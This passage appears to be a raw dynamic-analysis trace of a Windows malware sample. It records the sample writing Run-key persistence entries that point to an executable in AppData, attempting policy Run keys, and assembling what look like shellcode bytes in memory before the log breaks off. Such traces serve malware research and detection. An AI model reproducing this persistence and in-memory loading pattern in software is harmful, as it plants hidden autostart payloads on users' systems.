CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCreateKeyW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0200.281] SysStringLen (param_1="RegCreateKeyW") returned 0xe [0200.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCreateKeyW", cchWideChar=15, lpMultiByteStr=0x6d2614, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegCreateKeyW", lpUsedDefaultChar=0x0) returned 15 [0200.281] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.281] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.281] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0200.281] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.281] GetProcAddress (hModule=0x76490000, lpProcName="RegCreateKeyW") returned 0x764a1514 [0200.281] SafeArrayDestroyDescriptor (psa=0x6d2ea0) returned 0x0 [0200.281] SafeArrayDestroyDescriptor (psa=0x6d55e8) returned 0x0 [0200.281] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x30f460 | out: phkResult=0x30f460*=0x108) returned 0x0 [0200.282] SafeArrayDestroyDescriptor (psa=0x6d4310) returned 0x0 [0200.282] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f45c | out: ppsaOut=0x30f45c) returned 0x0 [0200.282] GetUserDefaultLCID () returned 0x409 [0200.282] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.282] SysStringLen (param_1="advapi32") returned 0x9 [0200.282] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.282] SysStringLen (param_1="advapi32") returned 0x9 [0200.282] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=10, lpMultiByteStr=0x6d20c4, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32", lpUsedDefaultChar=0x0) returned 10 [0200.282] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.283] GetUserDefaultLCID () returned 0x409 [0200.283] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.283] SysStringLen (param_1="RegSetValueExW") returned 0xf [0200.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegSetValueExW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0200.283] SysStringLen (param_1="RegSetValueExW") returned 0xf [0200.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegSetValueExW", cchWideChar=16, lpMultiByteStr=0x6d24ac, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegSetValueExW", lpUsedDefaultChar=0x0) returned 16 [0200.283] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.283] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.283] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0200.283] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.283] GetProcAddress (hModule=0x76490000, lpProcName="RegSetValueExW") returned 0x764a14d6 [0200.283] SafeArrayDestroyDescriptor (psa=0x6d6fc8) returned 0x0 [0200.284] SafeArrayDestroyDescriptor (psa=0x6d6f98) returned 0x0 [0200.284] RegSetValueExW (in: hKey=0x108, lpValueName="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe", cbData=0xde | out: lpData="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe") returned 0x0 [0200.284] SafeArrayDestroyDescriptor (psa=0x6d6f68) returned 0x0 [0200.284] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f45c | out: ppsaOut=0x30f45c) returned 0x0 [0200.285] GetUserDefaultLCID () returned 0x409 [0200.285] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.285] SysStringLen (param_1="advapi32") returned 0x9 [0200.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.285] SysStringLen (param_1="advapi32") returned 0x9 [0200.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=10, lpMultiByteStr=0x6ca6c4, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32", lpUsedDefaultChar=0x0) returned 10 [0200.285] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.285] GetUserDefaultLCID () returned 0x409 [0200.285] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.285] SysStringLen (param_1="RegCloseKey") returned 0xc [0200.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCloseKey", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0200.285] SysStringLen (param_1="RegCloseKey") returned 0xc [0200.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCloseKey", cchWideChar=13, lpMultiByteStr=0x6d263c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegCloseKey", lpUsedDefaultChar=0x0) returned 13 [0200.285] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.285] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.285] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0200.286] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.286] GetProcAddress (hModule=0x76490000, lpProcName="RegCloseKey") returned 0x764a469d [0200.286] SafeArrayDestroyDescriptor (psa=0x6d6fc8) returned 0x0 [0200.286] SafeArrayDestroyDescriptor (psa=0x6d6f98) returned 0x0 [0200.286] RegCloseKey (hKey=0x108) returned 0x0 [0200.286] SafeArrayDestroyDescriptor (psa=0x6d6f68) returned 0x0 [0200.286] GetUserDefaultLCID () returned 0x409 [0200.286] VarR8FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, pdblOut=0x30f5a0 | out: pdblOut=0x30f5a0) returned 0x0 [0200.286] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f45c | out: ppsaOut=0x30f45c) returned 0x0 [0200.287] GetUserDefaultLCID () returned 0x409 [0200.287] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.287] SysStringLen (param_1="advapi32") returned 0x9 [0200.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.287] SysStringLen (param_1="advapi32") returned 0x9 [0200.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=10, lpMultiByteStr=0x6ca424, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32", lpUsedDefaultChar=0x0) returned 10 [0200.287] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.287] GetUserDefaultLCID () returned 0x409 [0200.287] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.287] SysStringLen (param_1="RegCreateKeyW") returned 0xe [0200.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCreateKeyW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0200.287] SysStringLen (param_1="RegCreateKeyW") returned 0xe [0200.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCreateKeyW", cchWideChar=15, lpMultiByteStr=0x6d20c4, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegCreateKeyW", lpUsedDefaultChar=0x0) returned 15 [0200.287] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.288] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.288] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0200.288] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.288] GetProcAddress (hModule=0x76490000, lpProcName="RegCreateKeyW") returned 0x764a1514 [0200.288] SafeArrayDestroyDescriptor (psa=0x6d6fc8) returned 0x0 [0200.288] SafeArrayDestroyDescriptor (psa=0x6d6f98) returned 0x0 [0200.288] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x30f460 | out: phkResult=0x30f460*=0x108) returned 0x0 [0200.288] SafeArrayDestroyDescriptor (psa=0x6d6f68) returned 0x0 [0200.288] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f45c | out: ppsaOut=0x30f45c) returned 0x0 [0200.289] GetUserDefaultLCID () returned 0x409 [0200.289] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.289] SysStringLen (param_1="advapi32") returned 0x9 [0200.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.289] SysStringLen (param_1="advapi32") returned 0x9 [0200.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=10, lpMultiByteStr=0x6d259c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32", lpUsedDefaultChar=0x0) returned 10 [0200.289] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.289] GetUserDefaultLCID () returned 0x409 [0200.289] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.289] SysStringLen (param_1="RegSetValueExW") returned 0xf [0200.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegSetValueExW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0200.289] SysStringLen (param_1="RegSetValueExW") returned 0xf [0200.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegSetValueExW", cchWideChar=16, lpMultiByteStr=0x6d263c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegSetValueExW", lpUsedDefaultChar=0x0) returned 16 [0200.289] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.290] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.290] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0200.290] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.290] GetProcAddress (hModule=0x76490000, lpProcName="RegSetValueExW") returned 0x764a14d6 [0200.290] SafeArrayDestroyDescriptor (psa=0x6d6fc8) returned 0x0 [0200.290] SafeArrayDestroyDescriptor (psa=0x6d6f98) returned 0x0 [0200.290] RegSetValueExW (hKey=0x108, lpValueName="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", Reserved=0x0, dwType=0x1, lpData=0x6d7744, cbData=0xde) returned 0x5 [0200.290] SafeArrayDestroyDescriptor (psa=0x6d6f68) returned 0x0 [0200.290] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f45c | out: ppsaOut=0x30f45c) returned 0x0 [0200.291] GetUserDefaultLCID () returned 0x409 [0200.291] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.291] SysStringLen (param_1="advapi32") returned 0x9 [0200.291] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.291] SysStringLen (param_1="advapi32") returned 0x9 [0200.291] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=10, lpMultiByteStr=0x6ca6c4, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32", lpUsedDefaultChar=0x0) returned 10 [0200.291] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.291] GetUserDefaultLCID () returned 0x409 [0200.291] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.291] SysStringLen (param_1="RegCloseKey") returned 0xc [0200.291] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCloseKey", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0200.291] SysStringLen (param_1="RegCloseKey") returned 0xc [0200.291] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCloseKey", cchWideChar=13, lpMultiByteStr=0x6d24ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegCloseKey", lpUsedDefaultChar=0x0) returned 13 [0200.291] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.291] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.292] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0200.292] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.292] GetProcAddress (hModule=0x76490000, lpProcName="RegCloseKey") returned 0x764a469d [0200.292] SafeArrayDestroyDescriptor (psa=0x6d6fc8) returned 0x0 [0200.292] SafeArrayDestroyDescriptor (psa=0x6d6f98) returned 0x0 [0200.292] RegCloseKey (hKey=0x108) returned 0x0 [0200.292] SafeArrayDestroyDescriptor (psa=0x6d6f68) returned 0x0 [0200.292] GetUserDefaultLCID () returned 0x409 [0200.292] VarR8FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, pdblOut=0x30f5a0 | out: pdblOut=0x30f5a0) returned 0x0 [0200.293] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f460 | out: ppsaOut=0x30f460) returned 0x0 [0200.293] GetUserDefaultLCID () returned 0x409 [0200.293] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1f0, cchData=6 | out: lpLCData="1252") returned 5 [0200.293] SysStringLen (param_1="advapi32") returned 0x9 [0200.293] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.293] SysStringLen (param_1="advapi32") returned 0x9 [0200.293] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=10, lpMultiByteStr=0x6ca424, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32", lpUsedDefaultChar=0x0) returned 10 [0200.293] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f200 | out: ppsaOut=0x30f200) returned 0x0 [0200.293] GetUserDefaultLCID () returned 0x409 [0200.293] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1f0, cchData=6 | out: lpLCData="1252") returned 5 [0200.293] SysStringLen (param_1="RegCreateKeyW") returned 0xe [0200.293] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCreateKeyW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0200.293] SysStringLen (param_1="RegCreateKeyW") returned 0xe [0200.293] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCreateKeyW", cchWideChar=15, lpMultiByteStr=0x6d259c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegCreateKeyW", lpUsedDefaultChar=0x0) returned 15 [0200.293] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f200 | out: ppsaOut=0x30f200) returned 0x0 [0200.294] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.294] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0200.294] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.294] GetProcAddress (hModule=0x76490000, lpProcName="RegCreateKeyW") returned 0x764a1514 [0200.294] SafeArrayDestroyDescriptor (psa=0x6d6fc8) returned 0x0 [0200.294] SafeArrayDestroyDescriptor (psa=0x6d6f98) returned 0x0 [0200.294] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\run", phkResult=0x30f464 | out: phkResult=0x30f464*=0x0) returned 0x5 [0200.295] SafeArrayDestroyDescriptor (psa=0x6d6f68) returned 0x0 [0200.295] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f460 | out: ppsaOut=0x30f460) returned 0x0 [0200.295] GetUserDefaultLCID () returned 0x409 [0200.296] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1f0, cchData=6 | out: lpLCData="1252") returned 5 [0200.296] SysStringLen (param_1="advapi32") returned 0x9 [0200.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.296] SysStringLen (param_1="advapi32") returned 0x9 [0200.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=10, lpMultiByteStr=0x6d2614, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32", lpUsedDefaultChar=0x0) returned 10 [0200.296] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f200 | out: ppsaOut=0x30f200) returned 0x0 [0200.296] GetUserDefaultLCID () returned 0x409 [0200.296] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1f0, cchData=6 | out: lpLCData="1252") returned 5 [0200.296] SysStringLen (param_1="RegSetValueExW") returned 0xf [0200.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegSetValueExW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0200.296] SysStringLen (param_1="RegSetValueExW") returned 0xf [0200.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegSetValueExW", cchWideChar=16, lpMultiByteStr=0x6d24ac, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegSetValueExW", lpUsedDefaultChar=0x0) returned 16 [0200.296] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f200 | out: ppsaOut=0x30f200) returned 0x0 [0200.296] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.296] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0200.296] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.297] GetProcAddress (hModule=0x76490000, lpProcName="RegSetValueExW") returned 0x764a14d6 [0200.297] SafeArrayDestroyDescriptor (psa=0x6d6fc8) returned 0x0 [0200.297] SafeArrayDestroyDescriptor (psa=0x6d6f98) returned 0x0 [0200.297] RegSetValueExW (hKey=0x0, lpValueName="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", Reserved=0x0, dwType=0x1, lpData=0x6d6e4c, cbData=0xde) returned 0x6 [0200.297] SafeArrayDestroyDescriptor (psa=0x6d6f68) returned 0x0 [0200.297] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f460 | out: ppsaOut=0x30f460) returned 0x0 [0200.297] GetUserDefaultLCID () returned 0x409 [0200.297] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1f0, cchData=6 | out: lpLCData="1252") returned 5 [0200.297] SysStringLen (param_1="advapi32") returned 0x9 [0200.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.297] SysStringLen (param_1="advapi32") returned 0x9 [0200.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=10, lpMultiByteStr=0x6ca6c4, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32", lpUsedDefaultChar=0x0) returned 10 [0200.297] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f200 | out: ppsaOut=0x30f200) returned 0x0 [0200.298] GetUserDefaultLCID () returned 0x409 [0200.298] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1f0, cchData=6 | out: lpLCData="1252") returned 5 [0200.298] SysStringLen (param_1="RegCloseKey") returned 0xc [0200.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCloseKey", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0200.298] SysStringLen (param_1="RegCloseKey") returned 0xc [0200.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegCloseKey", cchWideChar=13, lpMultiByteStr=0x6d263c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegCloseKey", lpUsedDefaultChar=0x0) returned 13 [0200.298] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f200 | out: ppsaOut=0x30f200) returned 0x0 [0200.298] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.298] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0200.298] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.298] GetProcAddress (hModule=0x76490000, lpProcName="RegCloseKey") returned 0x764a469d [0200.299] SafeArrayDestroyDescriptor (psa=0x6d6fc8) returned 0x0 [0200.299] SafeArrayDestroyDescriptor (psa=0x6d6f98) returned 0x0 [0200.299] RegCloseKey (hKey=0x0) returned 0x6 [0200.299] SafeArrayDestroyDescriptor (psa=0x6d6f68) returned 0x0 [0200.299] SafeArrayDestroyDescriptor (psa=0x6d1eb8) returned 0x0 [0200.299] SafeArrayDestroyDescriptor (psa=0x6d2e08) returned 0x0 [0200.299] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0200.299] IMalloc:Alloc (This=0x75e366bc, cb=0x68) returned 0x6d7850 [0200.299] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0200.299] IMalloc:Alloc (This=0x75e366bc, cb=0x54) returned 0x6d1788 [0200.299] IMalloc:GetSize (This=0x75e366bc, pv=0x6d1788) returned 0x54 [0200.300] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.300] LoadLibraryA (lpLibFileName="KERNEL32") returned 0x76220000 [0200.300] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.300] GetProcAddress (hModule=0x76220000, lpProcName="RtlMoveMemory") returned 0x77e83c40 [0200.300] RtlMoveMemory (in: Destination=0x30f354, Source=0x6d1788, Length=0x4 | out: Destination=0x30f354) [0200.300] GetLastError () returned 0x0 [0200.300] RtlMoveMemory (in: Destination=0x30f350, Source=0x440758, Length=0x4 | out: Destination=0x30f350) [0200.300] GetLastError () returned 0x0 [0200.300] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x6d17c4 | out: ppsaOut=0x6d17c4) returned 0x0 [0200.300] GetUserDefaultLCID () returned 0x409 [0200.300] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.301] GetUserDefaultLCID () returned 0x409 [0200.301] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.301] GetUserDefaultLCID () returned 0x409 [0200.301] VarI2FromStr (in: strIn="&HEC", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.301] GetUserDefaultLCID () returned 0x409 [0200.301] VarI2FromStr (in: strIn="&H50", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.301] GetUserDefaultLCID () returned 0x409 [0200.301] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.301] GetUserDefaultLCID () returned 0x409 [0200.301] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.302] GetUserDefaultLCID () returned 0x409 [0200.302] VarI2FromStr (in: strIn="&H14", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.302] GetUserDefaultLCID () returned 0x409 [0200.302] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.302] 